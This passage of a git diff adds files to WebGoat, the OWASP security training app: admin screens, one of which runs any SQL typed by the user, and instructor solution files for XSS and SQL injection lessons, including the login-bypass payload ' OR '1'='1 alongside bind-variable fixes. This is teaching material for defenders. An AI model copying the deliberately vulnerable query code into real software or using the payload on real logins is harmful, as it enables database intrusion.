+	    if (lessonTracker.getCompleted())
+	    {
+		passedCount++;
+	    }
+	}
+	if (lessonCount == passedCount)
+	{
+	    adminComplete = true;
+	    totalUsersAdminComplete++;
+	}
+	text = Integer.toString(passedCount) + " of "
+		+ Integer.toString(lessonCount);
+	tr.addElement(new TD().setAlign("CENTER").addElement(text));
+
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		new Input(Input.SUBMIT, "View_" + user, "View")));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		new Input(Input.SUBMIT, "Delete_" + user, "Delete")));
+
+	if (normalComplete && adminComplete)
+	{
+	    tr.setBgColor(HtmlColor.GREEN);
+	}
+	else if (normalComplete)
+	{
+	    tr.setBgColor(HtmlColor.LIGHTGREEN);
+	}
+	else
+	{
+	    tr.setBgColor(HtmlColor.LIGHTBLUE);
+	}
+
+	return (tr);
+    }
+
+
+    public boolean isEnterprise()
+    {
+	return true;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
new file mode 100644
index 000000000..f5aadd51e
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
@@ -0,0 +1,128 @@
+package org.owasp.webgoat.lessons.admin;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.Statement;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.LessonAdapter;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class UserAdminScreen extends LessonAdapter
+{
+
+    private final static String QUERY = "SELECT * FROM user_system_data";
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    Statement statement = connection.createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement.executeQuery(QUERY);
+
+	    if (results != null)
+	    {
+		makeSuccess(s);
+		ResultSetMetaData resultsMetaData = results.getMetaData();
+		ec.addElement(DatabaseUtilities.writeTable(results,
+			resultsMetaData));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the UserAdminScreen object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.ADMIN_FUNCTIONS;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the role attribute of the UserAdminScreen object
+     *
+     * @return    The role value
+     */
+    public String getRole()
+    {
+	return HACKED_ADMIN_ROLE;
+    }
+
+
+    /**
+     *  Gets the title attribute of the UserAdminScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("User Information");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java
new file mode 100644
index 000000000..86d3e89db
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java
@@ -0,0 +1,172 @@
+package org.owasp.webgoat.lessons.admin;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+import org.owasp.webgoat.lessons.*;
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Input;
+import org.owasp.webgoat.session.*;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class ViewDatabase extends LessonAdapter
+{
+
+    private final static String SQL = "sql";
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    ec.addElement(new StringElement("Enter a SQL statement: "));
+
+	    StringBuffer sqlStatement = new StringBuffer(s.getParser()
+		    .getRawParameter(SQL, ""));
+	    Input input = new Input(Input.TEXT, SQL, sqlStatement.toString());
+	    ec.addElement(input);
+
+	    Element b = ECSFactory.makeButton("Go!");
+	    ec.addElement(b);
+
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    if (sqlStatement.length() > 0)
+	    {
+
+		Statement statement = connection.createStatement(
+			ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		ResultSet results = statement.executeQuery(sqlStatement
+			.toString());
+
+		if ((results != null) && (results.first() == true))
+		{
+		    makeSuccess(s);
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		}
+
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the DatabaseScreen object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.ADMIN_FUNCTIONS;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the DatabaseScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("There are no hints defined");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the ViewDatabase object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "Please post a message to to the WebGoat forum. Your messages will be available for everyone to read.";
+
+	return (instructions);
+    }
+
+
+    /**
+     *  Gets the role attribute of the ViewDatabase object
+     *
+     * @return    The role value
+     */
+    public String getRole()
+    {
+	return HACKED_ADMIN_ROLE;
+    }
+
+
+    /**
+     *  Gets the title attribute of the DatabaseScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Adhoc Query");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java
new file mode 100644
index 000000000..5e4ae2c01
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java
@@ -0,0 +1,91 @@
+package org.owasp.webgoat.lessons.admin;
+
+import org.owasp.webgoat.lessons.WelcomeScreen;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class WelcomeAdminScreen extends WelcomeScreen
+{
+
+    /**
+     *  Constructor for the WelcomeAdminScreen object
+     *
+     * @param  s  Description of the Parameter
+     */
+    public WelcomeAdminScreen(WebSession s)
+    {
+	super(s);
+    }
+
+
+    /**
+     *  Constructor for the WelcomeAdminScreen object
+     */
+    public WelcomeAdminScreen()
+    {}
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec.addElement(new Center(
+		new H1("You are logged on as an administrator")));
+	ec.addElement(super.createContent(s));
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the title attribute of the WelcomeAdminScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Admin Welcome");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/FindProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/FindProfile_i.java
new file mode 100644
index 000000000..55f43c14a
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/FindProfile_i.java
@@ -0,0 +1,57 @@
+package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
+
+
+import java.util.regex.Pattern;
+
+import org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/* STAGE 5 FIXES
+Solution Summary: Edit FindProfile.java and change getRequestParameter().  
+                  Modify getRequestParameter() with lines denoted by // STAGE 5 - FIX.
+Solution Steps: 
+1. Talk about the different parser methods.  We could have used the parser method that takes a regular expression.
+2. Call validate on the request parameter.
+		return validate(s.getParser().getRawParameter(name), (Pattern) patterns.get(name));
+
+    Note: patterns.get(name) is used to fetch the XSS validation pattern that is defined
+          in FindProfile.Java
+          
+      protected static Map patterns = new HashMap();
+		static
+		{
+			patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}"));
+		}
+
+*/
+
+public class FindProfile_i extends FindProfile
+{	
+	public FindProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
+	{
+		super(lesson, lessonName, actionName, chainedAction);
+	}
+
+	protected String getRequestParameter(WebSession s, String name) 
+			throws ParameterNotFoundException, ValidationException
+	{
+		// NOTE:
+		//
+		// In order for this to work generically, the name of the parameter and the name
+		// of the regular expression validation patter must be the same.
+		// 
+		// Another way this could be done is to use the reguler expression method in the
+		// ParameterParser class
+		
+		//	STAGE 5 - FIX
+		return validate(s.getParser().getRawParameter(name), (Pattern) patterns.get(name));
+		
+		// Note the design goal here...
+		//return s.getParser().getStringParameter(name), (Pattern) patterns.get(name));		
+	}
+	
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/UpdateProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/UpdateProfile_i.java
new file mode 100644
index 000000000..77121e169
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/UpdateProfile_i.java
@@ -0,0 +1,109 @@
+package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
+
+import java.util.regex.Pattern;
+
+import javax.servlet.http.HttpServletRequest;
+
+import org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting;
+import org.owasp.webgoat.lessons.CrossSiteScripting.UpdateProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.ParameterParser;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/* STAGE 2 FIXES
+Solution Summary: Edit UpdateProfile.java and change parseEmployeeProfile().  
+                  Modify parseEmployeeProfile() with lines denoted by // STAGE 2 - FIX.
+Solution Steps: 
+1. Talk about the different parser methods.  
+	a. parseEmployeeProfile(subjectId, s.getRequest()) 
+		- uses the request object directly.
+	 	- calling validate() on the appropriate parameter
+	b. parseEmployeeProfile(subjectId, s.getParser()) 
+		- uses the parser object to pull request data (centralized mechanism)
+
+2. Fix the request object version of the call  // STAGE 2 - FIX
+    Replace the call to:
+	   String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
+   
+    With:
+	   final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX
+	   String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE 2 - FIX
+
+
+3. Fix the parser version of the call.  //	 STAGE 2 - ALTERNATE FIX
+	Change all calls in parseEmployeeProfile(subjectId, s.getParser()) to use
+	the appropriate parser.method() call
+*/
+
+public class UpdateProfile_i extends UpdateProfile
+{
+	public UpdateProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
+	{
+		super(lesson, lessonName, actionName, chainedAction);
+	}
+
+
+	protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException, ValidationException
+	{
+		HttpServletRequest request = s.getRequest();
+		String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
+		String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
+		String ssn = request.getParameter(CrossSiteScripting.SSN);
+		String title = request.getParameter(CrossSiteScripting.TITLE);
+		String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
+
+		// Validate this parameter against a regular expression pattern designed for street addresses.
+		final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX
+		String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE 2 - FIX
+
+		String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
+		int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
+		String startDate = request.getParameter(CrossSiteScripting.START_DATE);
+		int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY));
+		String ccn = request.getParameter(CrossSiteScripting.CCN);
+		int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT));
+		String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
+		String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
+		String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
+		
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone,
+				address1, address2, manager, startDate, salary,
+				ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+				personalDescription);
+		
+		return employee;
+	}
+
+	protected Employee parseEmployeeProfile(int subjectId, ParameterParser parser) 
+			throws ParameterNotFoundException, ValidationException
+	{
+		//	 STAGE 2 - ALTERNATE FIX
+		String firstName = parser.getStrictAlphaParameter(CrossSiteScripting.FIRST_NAME, 20);
+		String lastName = parser.getStrictAlphaParameter(CrossSiteScripting.LAST_NAME, 20);
+		String ssn = parser.getSsnParameter(CrossSiteScripting.SSN);
+		String title = parser.getStrictAlphaParameter(CrossSiteScripting.TITLE, 20);
+		String phone = parser.getPhoneParameter(CrossSiteScripting.PHONE_NUMBER);
+		String address1 = parser.getStringParameter(CrossSiteScripting.ADDRESS1);
+		String address2 = parser.getStringParameter(CrossSiteScripting.ADDRESS2);
+		int manager = parser.getIntParameter(CrossSiteScripting.MANAGER);
+		String startDate = parser.getDateParameter(CrossSiteScripting.START_DATE);
+		int salary = parser.getIntParameter(CrossSiteScripting.SALARY);
+		String ccn = parser.getCcnParameter(CrossSiteScripting.CCN);
+		int ccnLimit = parser.getIntParameter(CrossSiteScripting.CCN_LIMIT);
+		String disciplinaryActionDate = parser.getDateParameter(CrossSiteScripting.DISCIPLINARY_DATE);
+		String disciplinaryActionNotes = parser.getStrictAlphaParameter(CrossSiteScripting.DISCIPLINARY_NOTES, 60);
+		String personalDescription = parser.getStrictAlphaParameter(CrossSiteScripting.DESCRIPTION, 60);
+		
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone,
+				address1, address2, manager, startDate, salary,
+				ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+				personalDescription);
+		
+		return employee;
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/ViewProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/ViewProfile_i.java
new file mode 100644
index 000000000..1f3a727ee
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/ViewProfile_i.java
@@ -0,0 +1,19 @@
+package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
+
+import org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+
+/* STAGE 4 FIXES
+Solution Summary: Look in the WebContent/lesson/CrossSiteScripting/ViewProfile.jsp
+
+Look for the <-- STAGE 4 - FIX    in the ViewProfile.jsp
+
+*/
+
+public class ViewProfile_i extends ViewProfile
+{
+	public ViewProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName)
+	{
+		super(lesson, lessonName, actionName);
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/RegexMatch.cs b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/RegexMatch.cs
new file mode 100644
index 000000000..444e06110
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/RegexMatch.cs
@@ -0,0 +1,17 @@
+using System.Data.SqlTypes;
+using System.Text.RegularExpressions;
+using Microsoft.SqlServer.Server;
+
+public static partial class UserDefinedFunctions
+{
+   public static readonly RegexOptions Options =
+       RegexOptions.IgnorePatternWhitespace |
+       RegexOptions.Compiled | RegexOptions.Singleline;
+
+   [SqlFunction]
+   public static SqlBoolean RegexMatch( SqlChars input, SqlString pattern )
+   {
+      Regex regex = new Regex( pattern.Value, Options );
+      return regex.IsMatch( new string( input.Value ) );
+   }
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/RegexMatch.dll b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/RegexMatch.dll
new file mode 100644
index 000000000..5783be026
Binary files /dev/null and b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/RegexMatch.dll differ
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/UpdateProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/UpdateProfile_i.java
new file mode 100755
index 000000000..eb836f47b
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/UpdateProfile_i.java
@@ -0,0 +1,137 @@
+package org.owasp.webgoat.lessons.instructor.DBCrossSiteScripting;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.CrossSiteScripting.UpdateProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+
+/* STAGE 2 FIXES
+Solution Summary (1. or 2.) 
+    1. Modify the UPDATE_EMPLOYEE stored procedure in the database and add
+       a validation step. Oracle 10G now supports regular expressions.
+    2. Apply a column constraint can also work IFF the existing data is clean
+
+Solution Steps: 
+1. Talk about the different database approaches.
+	a. Apply validation in the UPDATE stored proc
+		- Possible to bypass by not using that stored proc
+
+	b. Apply a table column constraint 
+		- Cannot be bypassed. The DB enforces the constraint under all conditions
+
+2. Fix the stored proc
+
+Define the pattern.
+Validate the field against the pattern.
+Raise an exception if invalid.
+
+CREATE OR REPLACE PROCEDURE UPDATE_EMPLOYEE(
+    v_userid IN employee.userid%type, 
+    v_first_name IN employee.first_name%type, 
+    v_last_name IN employee.last_name%type, 
+    v_ssn IN employee.ssn%type, 
+    v_title IN employee.title%type, 
+    v_phone IN employee.phone%type, 
+    v_address1 IN employee.address1%type, 
+    v_address2 IN employee.address2%type, 
+    v_manager IN employee.manager%type, 
+    v_start_date IN employee.start_date%type, 
+    v_salary IN employee.salary%type, 
+    v_ccn IN employee.ccn%type, 
+    v_ccn_limit IN employee.ccn_limit%type, 
+    v_disciplined_date IN employee.disciplined_date%type, 
+    v_disciplined_notes IN employee.disciplined_notes%type, 
+    v_personal_description IN employee.personal_description%type
+)
+AS 
+    P_ADDRESS1 VARCHAR2(100) := '^[a-zA-Z0-9,\. ]{0,80}$';  
+BEGIN
+    IF NOT REGEXP_LIKE(v_address1, P_ADDRESS1) THEN     
+        RAISE VALUE_ERROR;                              
+    END IF;                                             
+    UPDATE EMPLOYEE
+    SET
+        first_name = v_first_name, 
+        last_name = v_last_name, 
+        ssn = v_ssn, 
+        title = v_title, 
+        phone = v_phone, 
+        address1 = v_address1, 
+        address2 = v_address2, 
+        manager = v_manager, 
+        start_date = v_Start_date,
+        salary = v_salary, 
+        ccn = v_ccn, 
+        ccn_limit = v_ccn_limit, 
+        disciplined_date = v_disciplined_date, 
+        disciplined_notes = v_disciplined_notes, 
+        personal_description = v_personal_description
+    WHERE
+        userid = v_userid;
+END;
+/
+
+3. Apply a table column constraint
+   	ALTER TABLE EMPLOYEE
+		ADD CONSTRAINT address1_ck CHECK (REGEXP_LIKE(address1, '^[a-zA-Z0-9,\. ]{0,80}$'));
+		
+
+FOR SQL SERVER, the following is required:
+
+
+DROP PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
+GO
+
+CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
+    @v_userid INT,
+    @v_first_name VARCHAR(20),
+    @v_last_name VARCHAR(20),
+    @v_ssn VARCHAR(12),
+    @v_title VARCHAR(20),
+    @v_phone VARCHAR(13),
+    @v_address1 VARCHAR(80),
+    @v_address2 VARCHAR(80),
+    @v_manager INT,
+    @v_start_date CHAR(8),
+    @v_salary INT,
+    @v_ccn VARCHAR(30),
+    @v_ccn_limit INT,
+    @v_disciplined_date CHAR(8),
+    @v_disciplined_notes VARCHAR(60),
+    @v_personal_description VARCHAR(60)
+AS
+    IF [webgoat_guest].RegexMatch(@v_address1, N'^[a-zA-Z0-9,\. ]{0,80}$') = 0
+        BEGIN
+          RAISERROR('Illegal characters in address1', 11, 1)
+          RETURN
+        END
+    UPDATE EMPLOYEE
+    SET
+        first_name = @v_first_name, 
+        last_name = @v_last_name, 
+        ssn = @v_ssn, 
+        title = @v_title, 
+        phone = @v_phone, 
+        address1 = @v_address1, 
+        address2 = @v_address2, 
+        manager = @v_manager, 
+        start_date = @v_Start_date,
+        salary = @v_salary, 
+        ccn = @v_ccn, 
+        ccn_limit = @v_ccn_limit, 
+        disciplined_date = @v_disciplined_date, 
+        disciplined_notes = @v_disciplined_notes, 
+        personal_description = @v_personal_description
+    WHERE
+        userid = @v_userid;
+GO
+
+*/
+
+public class UpdateProfile_i extends UpdateProfile
+{
+	public UpdateProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
+	{
+		super(lesson, lessonName, actionName, chainedAction);
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBSQLInjection/Login_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBSQLInjection/Login_i.java
new file mode 100755
index 000000000..77df02cc0
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBSQLInjection/Login_i.java
@@ -0,0 +1,44 @@
+package org.owasp.webgoat.lessons.instructor.DBSQLInjection;
+
+/*
+ * The solution is to choose Neville's userid, and enter a password like:
+ * ' OR '1'='1
+ * Modify the Stored function LOGIN_EMPLOYEE to use fixed statements or bind variables
+ * 
+ * 
+ * For ORACLE:
+CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
+    cnt NUMBER;
+BEGIN
+  SELECT COUNT(*) INTO cnt FROM EMPLOYEE
+    WHERE USERID = v_id
+      AND PASSWORD = v_password;
+  RETURN cnt;
+END;
+/
+
+* OR
+
+CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
+    stmt VARCHAR(32767); cnt NUMBER;
+BEGIN
+    stmt  := 'SELECT COUNT (*) FROM EMPLOYEE WHERE USERID = :1 AND PASSWORD = :2';
+    EXECUTE IMMEDIATE stmt INTO cnt USING v_id, v_password;
+    RETURN cnt;
+END;
+/
+    
+ * For SQL SERVER
+    
+CREATE FUNCTION webgoat_guest.EMPLOYEE_LOGIN (
+    @v_id INT,
+    @v_password VARCHAR(100)
+) RETURNS INTEGER
+AS
+    BEGIN
+        DECLARE @count int
+        SELECT @count = COUNT(*) FROM EMPLOYEE WHERE USERID = @v_id AND PASSWORD = @v_password;
+        return @count
+    END
+
+*/
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/DeleteProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/DeleteProfile_i.java
new file mode 100644
index 000000000..f0ea850ca
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/DeleteProfile_i.java
@@ -0,0 +1,55 @@
+package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.DeleteProfile;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+public class DeleteProfile_i extends DeleteProfile
+{
+	
+	
+	public DeleteProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
+	{
+		super(lesson, lessonName, actionName, chainedAction);
+	}
+
+	public void doDeleteEmployeeProfile(WebSession s, int userId, int employeeId)
+			throws UnauthorizedException
+	{
+		if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.DELETEPROFILE_ACTION)) // FIX
+		{
+			try
+			{
+				String query = "DELETE FROM employee WHERE userid = " + employeeId;
+				//System.out.println("Query:  " + query);
+				try
+				{
+					Statement statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+					statement.executeUpdate(query);
+				}
+				catch ( SQLException sqle )
+				{
